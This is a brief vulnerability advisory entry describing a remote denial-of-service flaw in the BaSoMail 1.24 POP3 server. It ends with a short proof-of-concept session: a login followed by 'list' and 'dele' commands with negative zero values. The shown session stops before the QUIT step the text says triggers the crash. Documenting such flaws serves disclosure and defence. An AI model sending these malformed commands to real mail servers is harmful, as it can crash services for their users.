BaSoMail 1.24 POP3 Server Denial of Service Vulnerability

ID SSV:76466
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


BaSoMail POP3 server has been reported prone to a remote denial of service vulnerability.

It has been reported that a remote authenticated attacker, may supply negative value integers to several POP3 commands successively. If the attacker then invokes the QUIT command the BaSoMail server will reportedly fail, possibly due to an internal exception. 

+OK Welcome to BaSoMail (
user XXXX
pass XXXX
+OK Access granted
list -0
dele -0000